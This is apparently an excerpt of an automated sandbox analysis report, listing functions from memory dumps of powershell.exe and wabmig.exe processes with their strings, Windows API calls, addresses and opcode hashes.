d%lq, xrefs: 0712E795
tPfq, xrefs: 0712E761
4'fq, xrefs: 0712E7FF
d%lq, xrefs: 0712E727
d%lq, xrefs: 0712E78B

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
API String ID: 0-3104067135
Opcode ID: a3db66e90bd98000c75b5402f56cde8ddec4145bdd3c6a7965fa2a660eb8a50e
Instruction ID: fb7a24dc68f965f0f70cf91ed569e48a00f1895d285e5f07893fb7c051494f2a
Opcode Fuzzy Hash: a3db66e90bd98000c75b5402f56cde8ddec4145bdd3c6a7965fa2a660eb8a50e
Instruction Fuzzy Hash: 6631B3B4B00225DFDB28DF58C455A5ABBB2BF88710F158559E805AB380CB31EC16DBD1

Function 07129A10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$fq, xrefs: 07129A6C
$fq, xrefs: 07129A78
$fq, xrefs: 07129A3E
$fq, xrefs: 07129A22

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 1c147d6328db6ca8e65fc4d441cde65951af5c26bd7378cbc3c975cc406fc15b
Instruction ID: c2e98a165f7cbe2ed3211d8b5df8ca5d0ea3a19ff34ff1ff6ed30569b0849d13
Opcode Fuzzy Hash: 1c147d6328db6ca8e65fc4d441cde65951af5c26bd7378cbc3c975cc406fc15b
Instruction Fuzzy Hash: D3218EB13003665BDB74467D884076776DAABC0B14F24842AE48AEB3C1CF71E852A361

Function 071203E0 Relevance: 5.1, Strings: 4, Instructions: 55COMMON

Download Yara Rule

Strings

$fq, xrefs: 0712042A
4'fq, xrefs: 0712044B
$fq, xrefs: 07120436
4'fq, xrefs: 07120457

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq
API String ID: 0-2206495126
Opcode ID: 9171e9e86916da347e0e0d798f98769f31c91950bb58cc74b9e19faf037a8ab7
Instruction ID: 949e8130114b1b4a30e1df1a608b6ab8eb4573c3c383df2c91bcb1442fd7a984
Opcode Fuzzy Hash: 9171e9e86916da347e0e0d798f98769f31c91950bb58cc74b9e19faf037a8ab7
Instruction Fuzzy Hash: 1D0126627092E54FC73B033818202A26FB25FC755072A81EBC185DBBC3CA218C179393

Function 071225D9 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

$fq, xrefs: 071225F4
$fq, xrefs: 071225E8
4'fq, xrefs: 07122652
4'fq, xrefs: 07122646

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq
API String ID: 0-2206495126
Opcode ID: dfd2c6acfa4b32531fff932fbf1b97b84c357c157395c19d5bbe499998b45fee
Instruction ID: bc7f638f1de5ee593acae9f241bb79359c79e62adede54fcd6db4ab61a668b02
Opcode Fuzzy Hash: dfd2c6acfa4b32531fff932fbf1b97b84c357c157395c19d5bbe499998b45fee
Instruction Fuzzy Hash: 390192F27001599BCB1E8E69945066EBBBBBF86250B37C05ACC048B2D4CB35CC63A756

Analysis Process: wabmig.exePID: 6824, Parent PID: 5480COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	7

Executed Functions

Function 26952380 Relevance: 9.0, Strings: 6, Instructions: 1520COMMON

Download Yara Rule

Strings

$fq, xrefs: 2695387B
$fq, xrefs: 26953863
$fq, xrefs: 26953857
$fq, xrefs: 2695383A
$fq, xrefs: 26953887
$fq, xrefs: 2695382E

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: dfc44bfed6baaf02d003d2d24c52ca37b183670e90368aca6943657e61942669
Instruction ID: 3e5c1657b7e8ac58b9a2c7d14d511c3bf5557312aed7d57658da9f78abe57eb9
Opcode Fuzzy Hash: dfc44bfed6baaf02d003d2d24c52ca37b183670e90368aca6943657e61942669
Instruction Fuzzy Hash: 81E22834E002098FCB14DF68C594A9DB7B6FF89310F6585A9E409AB365EB34ED85CF80

Function 2695B300 Relevance: 8.3, Strings: 6, Instructions: 763COMMON

Download Yara Rule

Strings

$fq, xrefs: 2695BCCD
$fq, xrefs: 2695BC59
$fq, xrefs: 2695BC99
$fq, xrefs: 2695BCC1
$fq, xrefs: 2695BC65
$fq, xrefs: 2695BC8D

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: 2ed1aee5901d4c48a59cb958e9378d6dd5a956e8da798345aab0feec32026b16
Instruction ID: e3efd61e52af9a0bd798bbae345b1d4e369622a34ec6703ad1458a9f651758c0
Opcode Fuzzy Hash: 2ed1aee5901d4c48a59cb958e9378d6dd5a956e8da798345aab0feec32026b16
Instruction Fuzzy Hash: 6D5241B0E102098BDB14CF68C5A079EB7B6EB45310F21856AF516EB399DF34DD81CB91

Function 26957E40 Relevance: 3.0, Strings: 2, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 269583E7
$fq, xrefs: 269583DB

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 88f4415de0ca59b844ac443c8b7c410f13b356eaed16ee9ee483a7462eb5e738
Instruction ID: 47843427ff08337298d3537e11878a93bbf1c741b1c6682ac18aa8cd6be62690
Opcode Fuzzy Hash: 88f4415de0ca59b844ac443c8b7c410f13b356eaed16ee9ee483a7462eb5e738
Instruction Fuzzy Hash: 63028C34B002158BDB04DB69D694A9EB7E6FF84300F218969E806EB395DF35ED42CB90

Function 269566C0 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8045e2672d7196dd5ab815526f5e2e9f1f5cdcefd4fafce9efa40e8263cbd6d1
Instruction ID: 87e92b21b77c7f4aea2b3ab381d7f85ae2bcd48eacbdfdbabadfb74f96ff2085
Opcode Fuzzy Hash: 8045e2672d7196dd5ab815526f5e2e9f1f5cdcefd4fafce9efa40e8263cbd6d1
Instruction Fuzzy Hash: E9625C35B002058FDB14DB68C994A9DB7F6EF88310F2585A9E80AEB365DF35ED41CB90

Function 2695C240 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a737b5413b6288799d3067c0f4992ae6153d35995d45cc5336f59539060ac33f
Instruction ID: 9085899d8a227d6660604074b73fd744405d0ac3af8492e3c4d15e1d7cd332f3
Opcode Fuzzy Hash: a737b5413b6288799d3067c0f4992ae6153d35995d45cc5336f59539060ac33f
Instruction Fuzzy Hash: D0326B34B00209CFDB05DBA8D994A9DBBB6FB88310F218569E506EB355DF38ED41CB91

Function 269556A0 Relevance: .6, Instructions: 586COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa91405732f4422a7fc1b02ef1397eb2ff70de66664f6666b7bfe71e6eec518
Instruction ID: 8ed66f549ddbc7d3b95fd85eca2ea3097f8929350b26c8430272be1670aec13c
Opcode Fuzzy Hash: 0aa91405732f4422a7fc1b02ef1397eb2ff70de66664f6666b7bfe71e6eec518
Instruction Fuzzy Hash: 5A12F571F002159FDB10DB68C99065EB7BAEF84310F2184AAE94ADB396DF34ED45CB90

Function 2695AD98 Relevance: 10.4, Strings: 8, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 2695AEC5
$fq, xrefs: 2695AF18
$fq, xrefs: 2695AEB9
$fq, xrefs: 2695AF3B
$fq, xrefs: 2695AF64
$fq, xrefs: 2695AF47
$fq, xrefs: 2695AF0C
$fq, xrefs: 2695AF70

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: 24ddfe61e8d0add0db5e37254ef013231c11426dc35e6cae2d157866fa4495ea
Instruction ID: 8d5829f4c27ebd28eaae41552143f7ea28ede32359f5516aa3729e75d8871d49
Opcode Fuzzy Hash: 24ddfe61e8d0add0db5e37254ef013231c11426dc35e6cae2d157866fa4495ea
Instruction Fuzzy Hash: 58E18F70E102098FCB15DFA8D5906AEB7B6FF84300F218569E80AAB359DF349D46CB95

Function 26933210 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2693328E
GetCurrentThread.KERNEL32 ref: 269332CB
GetCurrentProcess.KERNEL32 ref: 26933308
GetCurrentThreadId.KERNEL32 ref: 26933361

Memory Dump Source

Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3ba6c8ac34ba326cad416570df07dad7f7327a00578a813cf552ad874de49002
Instruction ID: e3e92e77d9335fe7e0fd9b1238ecdab6191b4bf82f382eca2f0a86abc32a3bfb
Opcode Fuzzy Hash: 3ba6c8ac34ba326cad416570df07dad7f7327a00578a813cf552ad874de49002
Instruction Fuzzy Hash: DC5125B09013498FDB18DFAAC988B9EBBF6BF88314F248559E419A7350DB345940CB65

Function 2693320B Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2693328E
GetCurrentThread.KERNEL32 ref: 269332CB
GetCurrentProcess.KERNEL32 ref: 26933308
GetCurrentThreadId.KERNEL32 ref: 26933361

Memory Dump Source

Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dafeebcca5651396c843553f4ca021e9cc447a0a19199781f229009e9623bf91
Instruction ID: dbc917425d855dc05e1093280afbf9d951c4d4340e1bd74e67cceaa3d0b6c121
Opcode Fuzzy Hash: dafeebcca5651396c843553f4ca021e9cc447a0a19199781f229009e9623bf91
Instruction Fuzzy Hash: 995125B0D013498FDB18DFA9C988B9EBBF6FF88314F248559E419A7350DB349940CB65

Function 26959210 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 2695928C
$fq, xrefs: 269592BB
$fq, xrefs: 269592C7
$fq, xrefs: 26959280

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: e851f503ce541d7f43eeb2b51b3b3f5742068bccb321f3c006d33a169e6c237e
Instruction ID: a30825b868e16fbdc428e9f0c3932ebeafdf700020f622f00b925ce78ecccc33
Opcode Fuzzy Hash: e851f503ce541d7f43eeb2b51b3b3f5742068bccb321f3c006d33a169e6c237e
Instruction Fuzzy Hash: 22914F34F0021A8FDB55DB68C9907AE73F6FF89200F2185A9D409AB358EE349D428B91

Function 2695D008 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 2695D413
$fq, xrefs: 2695D407
$fq, xrefs: 2695D3FF

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq
API String ID: 0-837900676
Opcode ID: b48ce955d9e099c9fa5c95b0dccfd6d30bb32ab8c5867fdf6e9fe61e607469b4
Instruction ID: 7258359b6d988a263153410f221eb667ae71cf48894ae64e8f94ce9825c8a7a1
Opcode Fuzzy Hash: b48ce955d9e099c9fa5c95b0dccfd6d30bb32ab8c5867fdf6e9fe61e607469b4
Instruction Fuzzy Hash: 8F625E30A002068FCB19DF68D590A4EB7B6FF85300F219A69E405AF365DF35ED86CB95

Function 26954C68 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Okq, xrefs: 26954E43
fkq, xrefs: 26954C93
XPkq, xrefs: 26954DB9

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: fkq$XPkq$\Okq
API String ID: 0-673657909
Opcode ID: 967b01cfd65ab99545927de00431686fdbbc454e158e19866296d7f2edf51df5
Instruction ID: a2e2ab149c43b0e4e5856f211d9a8ed2ea04ddf3d16b905e1ac908e490d6cc0b
Opcode Fuzzy Hash: 967b01cfd65ab99545927de00431686fdbbc454e158e19866296d7f2edf51df5
Instruction Fuzzy Hash: CF617070F002189FDB55DFA8C8547AEBBF6EF88300F208469E506AB395DF755C458B90

Function 26959200 Relevance: 2.7, Strings: 2, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 269592BB
$fq, xrefs: 26959280

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: c8a6c7cbbef1dee2b7d2d969d23ab83ec6a85e9502db36f697b0b5a751cdf702
Instruction ID: 96c655cf851b7f422cf9118020eb1e56998f7aa945bfed8a4cb43c59b398166a
Opcode Fuzzy Hash: c8a6c7cbbef1dee2b7d2d969d23ab83ec6a85e9502db36f697b0b5a751cdf702
Instruction Fuzzy Hash: 4B515234B002169FEB15DB68D990BAE73F6FB89300F118569E509EB358EE34DD428B91

Function 26954C59 Relevance: 2.6, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fkq, xrefs: 26954C93
XPkq, xrefs: 26954DB9

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: fkq$XPkq
API String ID: 0-3439102645
Opcode ID: 8b67addcba21cb51136f1013a54ea62ba3811182e7bde610e236cc476fa42285
Instruction ID: 459b6ef05fa0fc92203b807a9475bb9e9ffb169bc5f41ca0386a6c07d881b6ea
Opcode Fuzzy Hash: 8b67addcba21cb51136f1013a54ea62ba3811182e7bde610e236cc476fa42285
Instruction Fuzzy Hash: B7514D70F002189FDB55DFA9C854BAEBBF6EF88700F208529E505AB395DE759C05CB90

Function 026DE7F9 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2927964162.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26d0000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45aa39aed41d8b3aa4d430822cb8b2781d9d52b56f2737c5c1bb91da041e45f8
Instruction ID: 3cf3970cbc3b39ca0111ab246695545026109b2bc23bdcac974abb88a13df7a4
Opcode Fuzzy Hash: 45aa39aed41d8b3aa4d430822cb8b2781d9d52b56f2737c5c1bb91da041e45f8
Instruction Fuzzy Hash: 4041F371D0438A8FCB14DF69D8042AABBF1AF89210F1585AAD508E7341DB349845CB91

Function 2693D7E4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2693D902

Memory Dump Source

Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e393f5d4e775cc9437b183b32e6ae83bc952d770a5a772f935f2a1cb0e2969f6
Instruction ID: 1e368a06e0c6c0365b3036c09a82d913d996bd79e2195f5a04aa684b3141fb7e
Opcode Fuzzy Hash: e393f5d4e775cc9437b183b32e6ae83bc952d770a5a772f935f2a1cb0e2969f6
Instruction Fuzzy Hash: B551D2B1D00349DFDB14CFA9C994ADEBBB5BF48310F24812AE818AB254D7719945CF90

Function 2693D7F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2693D902

Memory Dump Source

Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 75e355f1bd50bd9eac301a9dc26a3ea521408abc8fec9a622594cd3bf07015f7
Instruction ID: 86dc79fae8c56bbfb139ca649eedb80b40641c5d56850555f484b806476aaf1f
Opcode Fuzzy Hash: 75e355f1bd50bd9eac301a9dc26a3ea521408abc8fec9a622594cd3bf07015f7
Instruction Fuzzy Hash: 1B41C3B1D00309DFDB14CF99C894ADEFBB5BF48310F24812AE818AB254D7719845CF90

Function 26933450 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 269334DF

Memory Dump Source

Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1fecb35e163983c5539fd9ef1ce0710307f178b2e274f312dd33d8624d602dd9
Instruction ID: bfaa6887f922c90b8fe396226e2a8a8974bfcba8d6781c1433859fdcb540ada8
Opcode Fuzzy Hash: 1fecb35e163983c5539fd9ef1ce0710307f178b2e274f312dd33d8624d602dd9
Instruction Fuzzy Hash: B32105B5D00249AFDB10CFAAD984ADEFBF8EB48320F14801AE915A7350D375A950CFA1

Function 26933458 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 269334DF

Memory Dump Source

Source File: 00000006.00000002.2947065548.0000000026930000.00000040.00000800.00020000.00000000.sdmp, Offset: 26930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26930000_wabmig.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ff81c5feb913b146b89035c4b54396d8e25171ac9f629032d069c8b50ac06086
Instruction ID: 97112e3fdc7460fb1795fa359277d4df74c42cc747ce560f96e33ec0a7f90e6c
Opcode Fuzzy Hash: ff81c5feb913b146b89035c4b54396d8e25171ac9f629032d069c8b50ac06086
Instruction Fuzzy Hash: C721F8B5D002499FDB10CF9AD984ADEFFF4EB48320F14801AE914A3310D775A950CF60

Function 026DE8E0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 026DE947

Memory Dump Source

Source File: 00000006.00000002.2927964162.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26d0000_wabmig.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: a458256780d488892a3717b249061f275075b21f35e4a8e1ddbf47ff646f12ae
Instruction ID: 707353402baf811bb9f3efd54b88c83d8068e5aab0c42662db0ef45aac40490d
Opcode Fuzzy Hash: a458256780d488892a3717b249061f275075b21f35e4a8e1ddbf47ff646f12ae
Instruction Fuzzy Hash: C411F3B1C0065A9BCB10CFAAC545BDEFBF4AF48324F14816AD918A7240D779A944CFA5

Function 2695DB7D Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

PHfq, xrefs: 2695DCD9

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 287ade2d7458eff24be7ce799a07b56cee2a9e0df640bd27b3e19ba968657efa
Instruction ID: d7bf0744d3d48416ca9d8654dc987cccca014554e00bc78757221644983c012c
Opcode Fuzzy Hash: 287ade2d7458eff24be7ce799a07b56cee2a9e0df640bd27b3e19ba968657efa
Instruction Fuzzy Hash: ED418170E002499FDF15DF69C49469EBBB6EF85300F21496AE406EB380DF70998ACB95

Function 269521EB Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

PHfq, xrefs: 26952333

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 9e5be23cbcdb2c20f076cdf9ec39b6d5ecfe74f53bcd91c2c6010c2c145c8cb3
Instruction ID: a6fecdf608219bd86a70f25d42f7999526f65a2edac8f9bb9dcd89f2df50af1d
Opcode Fuzzy Hash: 9e5be23cbcdb2c20f076cdf9ec39b6d5ecfe74f53bcd91c2c6010c2c145c8cb3
Instruction Fuzzy Hash: DB31CF34B102018FCB09DB74C59465E7BA7EB89200F2589ADE406EB395EE35CD82CBE1

Function 269521F8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHfq, xrefs: 26952333

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: b9c080d44de58256ff95edd92922d471ba268f123a64d977dec6b49dad8b5a89
Instruction ID: d58a1d652234f821d9260254801eb553dd0061cbed7ebe37c6bac408f1bda18e
Opcode Fuzzy Hash: b9c080d44de58256ff95edd92922d471ba268f123a64d977dec6b49dad8b5a89
Instruction Fuzzy Hash: DB319034B102058FCF099B74859465F7BABEB89600F2189A9E406EB395DE35DC42CBE5

Function 26958390 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$fq, xrefs: 269583DB

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq
API String ID: 0-12477121
Opcode ID: cf5b781955e0f1561d1c0e31ae5f448b3841b1b95ac025140e9dbc4d31201bf0
Instruction ID: be0df4a41d03d8e724c6f39cc0766873db562ebfe27de1a24c85730fda0d4ab7
Opcode Fuzzy Hash: cf5b781955e0f1561d1c0e31ae5f448b3841b1b95ac025140e9dbc4d31201bf0
Instruction Fuzzy Hash: 53F0A435A10121CBDF19CF58DB9056977ADEB44314F2240A6FD05DB241CE35DE02C791

Function 2695B2F0 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6419ce6539e553f7f05dcd83479eb4a45aeac4aea97d07166f1347b2ab35a3e
Instruction ID: 7b57ac3207c21f5247b16f8db64acf8e47abeceba2bf2c7448e604b82d4fa6a8
Opcode Fuzzy Hash: d6419ce6539e553f7f05dcd83479eb4a45aeac4aea97d07166f1347b2ab35a3e
Instruction Fuzzy Hash: B6A164B4F101098BEF14CBA8C4A479E77BAEB89310F314469F506E739ADE38DD819B51

Function 2695B708 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb3724cf1592538ba86fc934235536f2eddc052682691c42449dd6827636796
Instruction ID: 16ca1614881d6e565dc943fabeac1e6f07825f06fee2e69bf3a9cad7f27a1a6a
Opcode Fuzzy Hash: 9bb3724cf1592538ba86fc934235536f2eddc052682691c42449dd6827636796
Instruction Fuzzy Hash: 64A16CB0E1020A8BDB10CB58C5A0B9DB7F6FB45314F2185A6F41AEB35ADF34D981CB91

Function 269562C0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f369588b0afd9c0b71f5738774ed2cf5e7dd2f3e5ffe2466f826b4fdccffaf75
Instruction ID: c77857084ace5b4d293494c05f4a0a600cf94488756528e6eb0c8b977c2a6b59
Opcode Fuzzy Hash: f369588b0afd9c0b71f5738774ed2cf5e7dd2f3e5ffe2466f826b4fdccffaf75
Instruction Fuzzy Hash: 31618F72F005224BDB05DA6ECC8455FAAEBAF84220B254479E80EDB375DE76ED0287D1

Function 26954399 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2299c5d1c3e1ec4e84da1b9f651c99b749d55ec8320360556ed7e197a9bf7a1
Instruction ID: f3c2162ef9f6202fbff7182c7b3146b19d78e75f9300592f1e9c7ec8251b4b0a
Opcode Fuzzy Hash: d2299c5d1c3e1ec4e84da1b9f651c99b749d55ec8320360556ed7e197a9bf7a1
